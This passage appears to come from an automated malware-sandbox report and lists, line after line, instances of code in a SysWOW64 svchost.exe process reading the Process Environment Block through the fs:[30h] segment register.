            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392826B mov eax, dword ptr fs:[00000030h]2_2_0392826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A0625D mov eax, dword ptr fs:[00000030h]2_2_03A0625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]2_2_039B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]2_2_0392A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03970185 mov eax, dword ptr fs:[00000030h]2_2_03970185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]2_2_039EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]2_2_039D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h]2_2_03A061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]2_2_039AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]2_2_039F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h]2_2_039601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]2_2_039DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h]2_2_039F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]2_2_039DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960124 mov eax, dword ptr fs:[00000030h]2_2_03960124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h]2_2_0392C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h]2_2_039C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]2_2_03A04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]2_2_03A04164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]2_2_03936154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]2_2_039C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393208A mov eax, dword ptr fs:[00000030h]2_2_0393208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h]2_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h]2_2_039F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039280A0 mov eax, dword ptr fs:[00000030h]2_2_039280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h]2_2_039C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h]2_2_039B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h]2_2_0392C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h]2_2_039720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0392A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h]2_2_039380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h]2_2_039B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]2_2_0394E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h]2_2_039B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]2_2_039D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h]2_2_039C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h]2_2_0392A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h]2_2_0392C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932050 mov eax, dword ptr fs:[00000030h]2_2_03932050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h]2_2_039B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h]2_2_0395C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D678E mov eax, dword ptr fs:[00000030h]2_2_039D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039307AF mov eax, dword ptr fs:[00000030h]2_2_039307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E47A0 mov eax, dword ptr fs:[00000030h]2_2_039E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h]2_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h]2_2_039B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]2_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]2_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h]2_2_039BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930710 mov eax, dword ptr fs:[00000030h]2_2_03930710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03960710 mov eax, dword ptr fs:[00000030h]2_2_03960710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h]2_2_0396C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov ecx, dword ptr fs:[00000030h]2_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]2_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AC730 mov eax, dword ptr fs:[00000030h]2_2_039AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]2_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930750 mov eax, dword ptr fs:[00000030h]2_2_03930750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE75D mov eax, dword ptr fs:[00000030h]2_2_039BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]2_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B4755 mov eax, dword ptr fs:[00000030h]2_2_039B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov esi, dword ptr fs:[00000030h]2_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]2_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938770 mov eax, dword ptr fs:[00000030h]2_2_03938770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]2_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]2_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039666B0 mov eax, dword ptr fs:[00000030h]2_2_039666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C6A6 mov eax, dword ptr fs:[00000030h]2_2_0396C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A6C7 mov eax, dword ptr fs:[00000030h]2_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]2_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]2_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03972619 mov eax, dword ptr fs:[00000030h]2_2_03972619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE609 mov eax, dword ptr fs:[00000030h]2_2_039AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]2_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394E627 mov eax, dword ptr fs:[00000030h]2_2_0394E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03966620 mov eax, dword ptr fs:[00000030h]2_2_03966620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968620 mov eax, dword ptr fs:[00000030h]2_2_03968620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393262C mov eax, dword ptr fs:[00000030h]2_2_0393262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0394C640 mov eax, dword ptr fs:[00000030h]2_2_0394C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03962674 mov eax, dword ptr fs:[00000030h]2_2_03962674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]2_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]2_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E59C mov eax, dword ptr fs:[00000030h]2_2_0396E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov eax, dword ptr fs:[00000030h]2_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov ecx, dword ptr fs:[00000030h]2_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964588 mov eax, dword ptr fs:[00000030h]2_2_03964588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039365D0 mov eax, dword ptr fs:[00000030h]2_2_039365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039325E0 mov eax, dword ptr fs:[00000030h]2_2_039325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6500 mov eax, dword ptr fs:[00000030h]2_2_039C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA49A mov eax, dword ptr fs:[00000030h]2_2_039EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039644B0 mov ecx, dword ptr fs:[00000030h]2_2_039644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BA4B0 mov eax, dword ptr fs:[00000030h]2_2_039BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039364AB mov eax, dword ptr fs:[00000030h]2_2_039364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039304E5 mov ecx, dword ptr fs:[00000030h]2_2_039304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A430 mov eax, dword ptr fs:[00000030h]2_2_0396A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C427 mov eax, dword ptr fs:[00000030h]2_2_0392C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA456 mov eax, dword ptr fs:[00000030h]2_2_039EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392645D mov eax, dword ptr fs:[00000030h]2_2_0392645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395245A mov eax, dword ptr fs:[00000030h]2_2_0395245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
